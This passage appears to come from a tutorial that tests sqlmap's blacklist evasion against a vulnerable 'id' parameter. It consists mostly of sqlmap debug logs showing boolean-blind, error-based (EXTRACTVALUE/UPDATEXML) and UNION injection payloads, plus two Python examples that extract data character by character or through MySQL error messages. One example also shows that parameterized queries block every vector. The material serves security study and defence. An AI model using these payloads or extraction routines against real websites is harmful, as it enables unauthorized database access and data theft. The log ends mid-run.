[09:08:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:08:51] [PAYLOAD] MAKE_SET(52=52,1)
[09:08:51] [PAYLOAD] MAKE_SET(97 52,1)
[09:08:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:08:51] [PAYLOAD] MAKE_SET(47=47,1)
[09:08:51] [PAYLOAD] MAKE_SET(47=85,1)
[09:08:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:08:51] [PAYLOAD] MAKE_SET(85=64,1)
[09:08:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:08:51] [PAYLOAD] MAKE_SET(64=64,1)
[09:08:51] [PAYLOAD] MAKE_SET(85 64,1)
[09:08:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:08:51] [PAYLOAD] MAKE_SET(59=59,1)
[09:08:51] [PAYLOAD] MAKE_SET(59=76,1)
[09:08:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:08:51] [PAYLOAD] MAKE_SET(76=62,1)
[09:08:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:08:51] [PAYLOAD] MAKE_SET(62=62,1)
[09:08:51] [PAYLOAD] MAKE_SET(76 62,1)
[09:08:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:08:51] [PAYLOAD] MAKE_SET(13=13,1)
[09:08:51] [PAYLOAD] MAKE_SET(13=18,1)
[09:08:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:08:51] [PAYLOAD] MAKE_SET(18=16,1)
[09:08:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:08:51] [PAYLOAD] MAKE_SET(16=16,1)
[09:08:51] [PAYLOAD] MAKE_SET(18 16,1)
[09:08:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:08:51] [PAYLOAD] MAKE_SET(78=78,1)
[09:08:51] [PAYLOAD] MAKE_SET(78=87,1)
[09:08:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:08:51] [PAYLOAD] MAKE_SET(87=83,1)
[09:08:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:08:51] [PAYLOAD] MAKE_SET(83=83,1)
[09:08:52] [PAYLOAD] MAKE_SET(87 83,1)
[09:08:52] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:08:52] [DEBUG] checking for parameter length constrainting mechanisms
[09:08:52] [PAYLOAD] MAKE_SET(4909=[...long run of spaces...]4909,1)
[09:08:52] [DEBUG] checking for filtered characters
[09:08:52] [PAYLOAD] MAKE_SET((2778)=2778,1)
[09:08:52] [PAYLOAD] MAKE_SET(2779>2778,1)
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
[09:08:52] [DEBUG] used the default behaviour, running in batch mode
sqlmap identified the following injection point(s) with a total of 1542 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)
    Payload: id=MAKE_SET(3858=3858,1)
    Vector: MAKE_SET([INFERENCE],[ORIGVALUE])
---

Ban AND, CASE and MAKE_SET

sqlmap uses the ELT function.

[09:11:52] [INFO] checking if the injection point on GET parameter 'id' is a false positive
[09:11:52] [PAYLOAD] ELT(47=47,1)
[09:11:52] [PAYLOAD] ELT(47=95,1)
[09:11:52] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:11:52] [PAYLOAD] ELT(95=75,1)
[09:11:52] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:11:52] [PAYLOAD] ELT(75=75,1)
[09:11:52] [PAYLOAD] ELT(95 75,1)
[09:11:52] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:11:52] [PAYLOAD] ELT(73=73,1)
[09:11:52] [PAYLOAD] ELT(73=94,1)
[09:11:52] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:11:52] [PAYLOAD] ELT(94=86,1)
[09:11:52] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:11:52] [PAYLOAD] ELT(86=86,1)
[09:11:52] [PAYLOAD] ELT(94 86,1)
[09:11:52] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:11:52] [PAYLOAD] ELT(45=45,1)
[09:11:52] [PAYLOAD] ELT(45=95,1)
[09:11:52] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:11:52] [PAYLOAD] ELT(95=92,1)
[09:11:52] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:11:52] [PAYLOAD] ELT(92=92,1)
[09:11:52] [PAYLOAD] ELT(95 92,1)
[09:11:52] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:11:52] [PAYLOAD] ELT(15=15,1)
[09:11:52] [PAYLOAD] ELT(15=91,1)
[09:11:52] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:11:52] [PAYLOAD] ELT(91=84,1)
[09:11:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:11:53] [PAYLOAD] ELT(84=84,1)
[09:11:53] [PAYLOAD] ELT(91 84,1)
[09:11:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:11:53] [PAYLOAD] ELT(17=17,1)
[09:11:53] [PAYLOAD] ELT(17=74,1)
[09:11:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:11:53] [PAYLOAD] ELT(74=28,1)
[09:11:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:11:53] [PAYLOAD] ELT(28=28,1)
[09:11:53] [PAYLOAD] ELT(74 28,1)
[09:11:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:11:53] [DEBUG] checking for parameter length constrainting mechanisms
[09:11:53] [PAYLOAD] ELT(5697=[...long run of spaces...]5697,1)
[09:11:53] [DEBUG] checking for filtered characters
[09:11:53] [PAYLOAD] ELT((2220)=2220,1)
[09:11:53] [PAYLOAD] ELT(2221>2220,1)
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
[09:11:53] [DEBUG] used the default behaviour, running in batch mode
sqlmap identified the following injection point(s) with a total of 1530 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - Parameter replace (ELT - original value)
    Payload: id=ELT(4348=4348,1)
    Vector: ELT([INFERENCE],[ORIGVALUE])
---

Ban AND, CASE, MAKE_SET and ELT

sqlmap simply multiplies the condition by the original value (bool*int).

[09:16:17] [INFO] checking if the injection point on GET parameter 'id' is a false positive
[09:16:17] [PAYLOAD] (66=66)*1
[09:16:17] [PAYLOAD] (66=93)*1
[09:16:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:16:17] [PAYLOAD] (93=90)*1
[09:16:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:16:17] [PAYLOAD] (90=90)*1
[09:16:17] [PAYLOAD] (93 90)*1
[09:16:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:16:17] [PAYLOAD] (32=32)*1
[09:16:17] [PAYLOAD] (32=44)*1
[09:16:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:16:17] [PAYLOAD] (44=39)*1
[09:16:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:16:17] [PAYLOAD] (39=39)*1
[09:16:17] [PAYLOAD] (44 39)*1
[09:16:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:16:17] [PAYLOAD] (54=54)*1
[09:16:17] [PAYLOAD] (54=99)*1
[09:16:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:16:17] [PAYLOAD] (99=89)*1
[09:16:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:16:18] [PAYLOAD] (89=89)*1
[09:16:18] [PAYLOAD] (99 89)*1
[09:16:18] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:16:18] [PAYLOAD] (29=29)*1
[09:16:18] [PAYLOAD] (29=95)*1
[09:16:18] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:16:18] [PAYLOAD] (95=76)*1
[09:16:18] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:16:18] [PAYLOAD] (76=76)*1
[09:16:18] [PAYLOAD] (95 76)*1
[09:16:18] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:16:18] [PAYLOAD] (42=42)*1
[09:16:18] [PAYLOAD] (42=88)*1
[09:16:18] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:16:18] [PAYLOAD] (88=74)*1
[09:16:18] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:16:18] [PAYLOAD] (74=74)*1
[09:16:18] [PAYLOAD] (88 74)*1
[09:16:18] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:16:18] [DEBUG] checking for parameter length constrainting mechanisms
[09:16:18] [PAYLOAD] (6948=[...long run of spaces...]6948)*1
[09:16:18] [DEBUG] checking for filtered characters
[09:16:18] [PAYLOAD] ((2671)=2671)*1
[09:16:18] [PAYLOAD] (2672>2671)*1
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
[09:16:18] [DEBUG] used the default behaviour, running in batch mode
sqlmap identified the following injection point(s) with a total of 1518 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - Parameter replace (bool*int - original value)
    Payload: id=(9095=9095)*1
    Vector: ([INFERENCE])*[ORIGVALUE]
---

Ban AND, CASE, MAKE_SET, ELT and *, and the boolean-based run fails.
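To make the fallback chain above concrete, here is an added example; it is not code from the page. It rebuilds the target view's shape (keyword blacklist, then string concatenation into `SELECT * FROM test where id =`, then a 500 whenever no row comes back) on top of an in-memory sqlite database instead of MySQL, emulating MAKE_SET and ELT as user functions because sqlite lacks them, and assuming a table test(id, name) holding the row alice. It then runs the same character-by-character bisection sqlmap's boolean-based blind performs through each of the five vectors from the logs, reports which of them still leak the column under each ban list, and shows that binding the parameter instead of splicing it stops every one of them. The CASE vector is simplified (ELSE 0 rather than sqlmap's two-row DUAL subquery), and the inference uses sqlite's unicode()/substr() in place of MySQL's ORD()/MID().

```python
import sqlite3

# Constructed stand-in for the page's MySQL table `test` (assumption: columns id, name).
ROWS = [(1, "alice"), (2, "bob")]

def _make_set(bits, *strs):
    """MySQL MAKE_SET(bits, s1, ...): the strings whose bit is set; MAKE_SET(0,1) -> ''."""
    bits = int(bits or 0)
    return ",".join(str(s) for i, s in enumerate(strs) if bits & (1 << i))

def _elt(n, *strs):
    """MySQL ELT(n, s1, ...): 1-based pick; ELT(0,1) -> NULL."""
    n = int(n or 0)
    return str(strs[n - 1]) if 1 <= n <= len(strs) else None

class Target:
    """Mimics the page's view: `SELECT * FROM test where id =` + id, a keyword blacklist that
    answers 500 when tripped, and `data[1]` that also raises (500) when no row comes back.
    page_ok() is the one-bit oracle sqlmap reads: True means the normal page rendered."""

    def __init__(self, banned=(), hardened=False):
        self.conn = sqlite3.connect(":memory:")
        self.conn.execute("CREATE TABLE test(id INTEGER, name TEXT)")
        self.conn.executemany("INSERT INTO test VALUES (?, ?)", ROWS)
        self.conn.create_function("MAKE_SET", -1, _make_set)  # MySQL-only, emulated for sqlite
        self.conn.create_function("ELT", -1, _elt)
        self.banned = [b.upper() for b in banned]
        self.hardened = hardened

    def page_ok(self, id_param):
        if any(b in id_param.upper() for b in self.banned):
            return False                                   # blacklist tripped -> 500
        try:
            if self.hardened:                              # the fix: bind, never splice
                cur = self.conn.execute("SELECT * FROM test WHERE id = ?", (id_param,))
            else:                                          # the page's concatenation
                cur = self.conn.execute("SELECT * FROM test WHERE id = " + id_param)
            row = cur.fetchone()
        except sqlite3.Error:
            return False                                   # SQL error -> 500
        return row is not None                             # no row -> data[1] raises -> 500

# The boolean vectors in the order sqlmap fell back to them in the logs; {inf} is [INFERENCE].
# CASE is simplified: sqlmap's ELSE branch forces an error with a two-row subquery on DUAL,
# which sqlite cannot express, so ELSE 0 (id=0, no row) plays the same role here.
VECTORS = {
    "AND":      "1 AND ({inf})",
    "CASE":     "(CASE WHEN ({inf}) THEN 1 ELSE 0 END)",
    "MAKE_SET": "MAKE_SET({inf},1)",
    "ELT":      "ELT({inf},1)",
    "bool*int": "({inf})*1",
}

def inference(pos, n):
    """One yes/no question; the sqlite spelling of sqlmap's ORD(MID((query),pos,1))>n."""
    return f"unicode(substr((SELECT name FROM test WHERE id=1),{pos},1))>{n}"

def extract(target, vector, max_len=32):
    """Character-by-character bisection of the ASCII range, as boolean-based blind does.
    Returns '' when the vector never yields a 'true' page (blocked, or target not injectable)."""
    out = ""
    for pos in range(1, max_len + 1):
        if not target.page_ok(vector.format(inf=inference(pos, 0))):
            break                      # past the end of the string, or the vector is blocked
        lo, hi = 0, 128                # invariant: ord>lo is true, ord>hi is false
        while hi - lo > 1:
            mid = (lo + hi) // 2
            if target.page_ok(vector.format(inf=inference(pos, mid))):
                lo = mid
            else:
                hi = mid
        out += chr(hi)
    return out

def run_experiment(banned=(), hardened=False):
    """Which vectors still leak `name` when the given keywords are blacklisted."""
    target = Target(banned, hardened)
    return {name: extract(target, vec) for name, vec in VECTORS.items()}

if __name__ == "__main__":
    for banned in ([], ["AND"], ["AND", "CASE"], ["AND", "CASE", "MAKE_SET", "ELT", "*"]):
        print(banned, run_experiment(banned))
    print("parameterized", run_experiment([], hardened=True))
```

Each ban list removes exactly one vector and leaves the rest working, which is the page's result in miniature; only the parameterized query returns an empty result for every vector, because the whole payload is then compared against the id column as a value and never parsed as SQL.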

Error-based injection (E)

Default

extractvalue() is a function for querying XML documents, much like locating elements in an HTML file by their <div>, <p> or <a> tags. Syntax: extractvalue(target XML document, XPath). The second argument, the position inside the XML, is the part we can play with. An XML path is written as /xxx/xxx/xxx/...; if we pass anything in another format the function raises an error, and the error message echoes the illegal content back, so the illegal content is made to be the value we want to read. A well-formed second argument (/xxx/xx/xx/xx) never errors, even when nothing matches: select username from security.user where id=1 and (extractvalue('anything','/x/xx'))
[09:22:46] [PAYLOAD] 1 AND EXTRACTVALUE(7450,CONCAT(0x5c,0x7176627171,(SELECT (CASE WHEN (5241=[...long run of spaces...]5241) THEN 1 ELSE 0 END)),0x71626a6b71))
[09:22:46] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:22:46] [DEBUG] performed 1 queries in 0.12 seconds
[09:22:46] [DEBUG] checking for filtered characters
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
[09:22:46] [DEBUG] used the default behaviour, running in batch mode
sqlmap identified the following injection point(s) with a total of 430 HTTP(s) requests:
---
Parameter: id (GET)
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: id=1 AND EXTRACTVALUE(4041,CONCAT(0x5c,0x7176627171,(SELECT (ELT(4041=4041,1))),0x71626a6b71))
    Vector: AND EXTRACTVALUE([RANDNUM],CONCAT('','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))
---

Ban AND, and OR is used instead.

[09:27:36] [PAYLOAD] 1 OR EXTRACTVALUE(6984,CONCAT(0x5c,0x716b7a7171,(SELECT (CASE WHEN (2831=[...long run of spaces...]2831) THEN 1 ELSE 0 END)),0x717a7a7171))
[09:27:36] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:27:36] [DEBUG] performed 1 queries in 0.13 seconds
[09:27:36] [DEBUG] checking for filtered characters
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
[09:27:36] [DEBUG] used the default behaviour, running in batch mode
sqlmap identified the following injection point(s) with a total of 483 HTTP(s) requests:
---
Parameter: id (GET)
    Type: error-based
    Title: MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: id=1 OR EXTRACTVALUE(9441,CONCAT(0x5c,0x716b7a7171,(SELECT (ELT(9441=9441,1))),0x717a7a7171))
    Vector: OR EXTRACTVALUE([RANDNUM],CONCAT('','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))
---

Ban AND and OR, and UPDATEXML appears, replacing the whole parameter.

[09:29:23] [PAYLOAD] (UPDATEXML(9878,CONCAT(0x2e,0x7162716b71,(SELECT (CASE WHEN (8893=[...long run of spaces...]8893) THEN 1 ELSE 0 END)),0x716b6b6271),9352))
[09:29:23] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:29:23] [DEBUG] performed 1 queries in 0.16 seconds
[09:29:23] [DEBUG] checking for filtered characters
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
[09:29:23] [DEBUG] used the default behaviour, running in batch mode
sqlmap identified the following injection point(s) with a total of 838 HTTP(s) requests:
---
Parameter: id (GET)
    Type: error-based
    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
    Payload: id=(UPDATEXML(6736,CONCAT(0x2e,0x7162716b71,(SELECT (ELT(6736=6736,1))),0x716b6b6271),8672))
    Vector: (UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]))
---
[09:29:23] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1

Ban AND, OR and UPDATEXML, and EXTRACTVALUE comes back, this time as a parameter replacement rather than behind AND/OR.

[09:31:15] [PAYLOAD] (EXTRACTVALUE(1250,CONCAT(0x5c,0x7171627671,(SELECT (CASE WHEN (9342=[...long run of spaces...]9342) THEN 1 ELSE 0 END)),0x716b6b6271)))
[09:31:15] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:31:15] [DEBUG] performed 1 queries in 0.18 seconds
[09:31:15] [DEBUG] checking for filtered characters
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
[09:31:15] [DEBUG] used the default behaviour, running in batch mode
sqlmap identified the following injection point(s) with a total of 839 HTTP(s) requests:
---
Parameter: id (GET)
    Type: error-based
    Title: MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)
    Payload: id=(EXTRACTVALUE(3610,CONCAT(0x5c,0x7171627671,(SELECT (ELT(3610=3610,1))),0x716b6b6271)))
    Vector: (EXTRACTVALUE([RANDNUM],CONCAT('','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')))
---

Ban AND, OR, UPDATEXML and EXTRACTVALUE, and the error-based run fails.
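The logs show the payloads but not how the answer comes back, so here is an added example (not the page's code) of the error channel end to end. The builder fills sqlmap's EXTRACTVALUE vector exactly as the Payload line above does; the two 0x... delimiters decode to qvbqq and qbjkq (sqlmap picks fresh q+three letters+q markers per run), and the leading 0x5c is a backslash that makes the XPath invalid so MySQL quotes the whole CONCAT back in its XPATH syntax error. The parser pulls the value out from between the markers. Everything on the server side is constructed: FakeTarget is not a SQL engine, it only understands the two query shapes the example sends and answers with the pymysql error text a Django 500 page would leak, cut at 32 characters the way MySQL truncates this error (that cap and the version string are assumptions), which is why the extractor reads long values in MID() chunks.

```python
import re

# Delimiter literals copied from the EXTRACTVALUE payload in the log above. sqlmap draws fresh
# ones per run ('q' + three random letters + 'q'); sent as 0x... so no quote characters are needed.
DELIM_START_HEX = "0x7176627171"   # 'qvbqq'
DELIM_STOP_HEX = "0x71626a6b71"    # 'qbjkq'
XPATH_ERROR_CAP = 32   # characters MySQL shows inside "XPATH syntax error: '...'" (assumption)

def decode_hex_literal(lit):
    """A MySQL 0x... literal used in string context is just those bytes."""
    return bytes.fromhex(lit[2:]).decode("ascii")

def error_payload(query, randnum=4041, start_hex=DELIM_START_HEX, stop_hex=DELIM_STOP_HEX):
    """Fill AND EXTRACTVALUE([RANDNUM],CONCAT('','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')).
    0x5c (a backslash) makes the XPath invalid, so MySQL echoes the whole CONCAT in its error."""
    return f"1 AND EXTRACTVALUE({randnum},CONCAT(0x5c,{start_hex},({query}),{stop_hex}))"

def parse_error_response(body, start_hex=DELIM_START_HEX, stop_hex=DELIM_STOP_HEX):
    """Return (value, complete). value is None when the start marker never leaked (the error
    text is not reaching the client); complete is False when the stop marker was cut off by
    the cap, meaning the value has to be fetched in MID() chunks instead."""
    start, stop = decode_hex_literal(start_hex), decode_hex_literal(stop_hex)
    i = body.find(start)
    if i < 0:
        return None, False
    rest = body[i + len(start):]
    j = rest.find(stop)
    if j < 0:
        return rest.split("'")[0], False
    return rest[:j], True

class FakeTarget:
    """Constructed stand-in for the page's view plus MySQL: understands only a bare query or
    MID((query),off,len) inside the vector, and answers with the pymysql error text a 500
    page would show, capped the way MySQL caps it. Not a SQL engine."""
    PAYLOAD_RE = re.compile(r"1 AND EXTRACTVALUE\(\d+,CONCAT\(0x5c,(0x[0-9a-f]+),\((.*)\),(0x[0-9a-f]+)\)\)")
    MID_RE = re.compile(r"MID\(\((.*)\),(\d+),(\d+)\)")

    def __init__(self, rows):
        self.rows = rows                                   # query text -> value (constructed)

    def get(self, id_param):
        m = self.PAYLOAD_RE.fullmatch(id_param)
        if not m:
            return "<html>normal page</html>"
        start, expr, stop = decode_hex_literal(m.group(1)), m.group(2), decode_hex_literal(m.group(3))
        mm = self.MID_RE.fullmatch(expr)
        if mm:
            off, length = int(mm.group(2)), int(mm.group(3))
            value = self.rows[mm.group(1)][off - 1:off - 1 + length]
        else:
            value = self.rows[expr]
        xpath = "\\" + start + value + stop
        return f"OperationalError: (1105, \"XPATH syntax error: '{xpath[:XPATH_ERROR_CAP]}'\")"

def extract_via_error(target, query, cap=XPATH_ERROR_CAP):
    """Read `query` through the error channel, chunking with MID() so that the backslash,
    both delimiters and the chunk always fit under the cap; stops at the first short chunk."""
    width = cap - 1 - len(decode_hex_literal(DELIM_START_HEX)) - len(decode_hex_literal(DELIM_STOP_HEX))
    out, off = "", 1
    while True:
        body = target.get(error_payload(f"MID(({query}),{off},{width})"))
        value, complete = parse_error_response(body)
        if value is None or not complete:
            raise RuntimeError("error-based channel not usable for this target")
        out += value
        if len(value) < width:
            return out
        off += width

CONSTRUCTED_ROWS = {"SELECT @@version": "8.0.36-0ubuntu0.22.04.1"}   # constructed sample data

if __name__ == "__main__":
    t = FakeTarget(CONSTRUCTED_ROWS)
    print(parse_error_response(t.get(error_payload("SELECT @@version"))))   # cut off by the cap
    print(extract_via_error(t, "SELECT @@version"))                         # chunked, complete
```

Asking for the whole value in one request loses the stop marker to the cap, so the parser reports it as incomplete; the chunked read fetches 21 characters at a time (32 minus the backslash and two 5-character delimiters) and reassembles the full string. On a real target the same two markers are what a WAF or log reviewer can key on: a q+3 letters+q pair inside a CONCAT in a 500 response is a recognizable fingerprint of this technique.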

UNION query injection (U)

Default

[09:37:07] [INFO] checking if the injection point on GET parameter 'id' is a false positive
[09:37:07] [PAYLOAD] -1466 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (17=17) THEN 1 ELSE 0 END),0x7162717671)-- hZgY
[09:37:07] [DEBUG] performed 1 queries in 0.01 seconds
[09:37:07] [PAYLOAD] -6665 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (17=24) THEN 1 ELSE 0 END),0x7162717671)-- YsNa
[09:37:07] [DEBUG] performed 1 queries in 0.02 seconds
[09:37:07] [PAYLOAD] -4215 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (17=51) THEN 1 ELSE 0 END),0x7162717671)-- ejrD
[09:37:07] [DEBUG] performed 1 queries in 0.01 seconds
[09:37:07] [PAYLOAD] -8306 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (51=24) THEN 1 ELSE 0 END),0x7162717671)-- yobT
[09:37:07] [DEBUG] performed 1 queries in 0.01 seconds
[09:37:07] [PAYLOAD] -8304 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (24=24) THEN 1 ELSE 0 END),0x7162717671)-- Gyxy
[09:37:07] [DEBUG] performed 1 queries in 0.01 seconds
[09:37:07] [PAYLOAD] -4122 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (51 24) THEN 1 ELSE 0 END),0x7162717671)-- zULK
[09:37:07] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:37:07] [DEBUG] performed 1 queries in 0.14 seconds
[09:37:07] [PAYLOAD] -2502 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (47=47) THEN 1 ELSE 0 END),0x7162717671)-- QCrG
[09:37:07] [DEBUG] performed 1 queries in 0.01 seconds
[09:37:07] [PAYLOAD] -9061 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (47=70) THEN 1 ELSE 0 END),0x7162717671)-- SJaU
[09:37:07] [DEBUG] performed 1 queries in 0.01 seconds
[09:37:07] [PAYLOAD] -4383 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (47=95) THEN 1 ELSE 0 END),0x7162717671)-- ailf
[09:37:07] [DEBUG] performed 1 queries in 0.01 seconds
[09:37:07] [PAYLOAD] -4171 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (95=70) THEN 1 ELSE 0 END),0x7162717671)-- TkVB
[09:37:07] [DEBUG] performed 1 queries in 0.01 seconds
[09:37:07] [PAYLOAD] -1142 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (70=70) THEN 1 ELSE 0 END),0x7162717671)-- YlcG
[09:37:07] [DEBUG] performed 1 queries in 0.01 seconds
[09:37:07] [PAYLOAD] -8375 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (95 70) THEN 1 ELSE 0 END),0x7162717671)-- Ijdy
[09:37:08] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:37:08] [DEBUG] performed 1 queries in 0.15 seconds
[09:37:08] [PAYLOAD] -4934 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (25=25) THEN 1 ELSE 0 END),0x7162717671)-- IYqW
[09:37:08] [DEBUG] performed 1 queries in 0.02 seconds
[09:37:08] [PAYLOAD] -1613 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (25=31) THEN 1 ELSE 0 END),0x7162717671)-- lFQL
[09:37:08] [DEBUG] performed 1 queries in 0.01 seconds
[09:37:08] [PAYLOAD] -2297 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (25=63) THEN 1 ELSE 0 END),0x7162717671)-- Koxh
[09:37:08] [DEBUG] performed 1 queries in 0.01 seconds
[09:37:08] [PAYLOAD] -3230 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (63=31) THEN 1 ELSE 0 END),0x7162717671)-- DFuT
[09:37:08] [DEBUG] performed 1 queries in 0.01 seconds
[09:37:08] [PAYLOAD] -4541 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (31=31) THEN 1 ELSE 0 END),0x7162717671)-- wbyE
[09:37:08] [DEBUG] performed 1 queries in 0.01 seconds
[09:37:08] [PAYLOAD] -4571 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (63 31) THEN 1 ELSE 0 END),0x7162717671)-- RoAK
[09:37:08] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:37:08] [DEBUG] performed 1 queries in 0.13 seconds
[09:37:08] [PAYLOAD] -4255 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (12=12) THEN 1 ELSE 0 END),0x7162717671)-- HeVB
[09:37:08] [DEBUG] performed 1 queries in 0.01 seconds
[09:37:08] [PAYLOAD] -2162 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (12=59) THEN 1 ELSE 0 END),0x7162717671)-- UdBM
[09:37:08] [DEBUG] performed 1 queries in 0.01 seconds
[09:37:08] [PAYLOAD] -3636 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (12=85) THEN 1 ELSE 0 END),0x7162717671)-- quEm
[09:37:08] [DEBUG] performed 1 queries in 0.01 seconds
[09:37:08] [PAYLOAD] -9996 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (85=59) THEN 1 ELSE 0 END),0x7162717671)-- tmiF
[09:37:08] [DEBUG] performed 1 queries in 0.03 seconds
[09:37:08] [PAYLOAD] -1861 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (59=59) THEN 1 ELSE 0 END),0x7162717671)-- dZZv
[09:37:08] [DEBUG] performed 1 queries in 0.01 seconds
[09:37:08] [PAYLOAD] -2005 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (85 59) THEN 1 ELSE 0 END),0x7162717671)-- OulK
[09:37:08] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:37:08] [DEBUG] performed 1 queries in 0.11 seconds
[09:37:08] [PAYLOAD] -2028 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (26=26) THEN 1 ELSE 0 END),0x7162717671)-- iRZQ
[09:37:08] [DEBUG] performed 1 queries in 0.01 seconds
[09:37:08] [PAYLOAD] -2447 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (26=39) THEN 1 ELSE 0 END),0x7162717671)-- IPSM
[09:37:08] [DEBUG] performed 1 queries in 0.01 seconds
[09:37:08] [PAYLOAD] -8785 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (26=83) THEN 1 ELSE 0 END),0x7162717671)-- cbzQ
[09:37:08] [DEBUG] performed 1 queries in 0.02 seconds
[09:37:08] [PAYLOAD] -2637 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (83=39) THEN 1 ELSE 0 END),0x7162717671)-- wwBL
[09:37:08] [DEBUG] performed 1 queries in 0.01 seconds
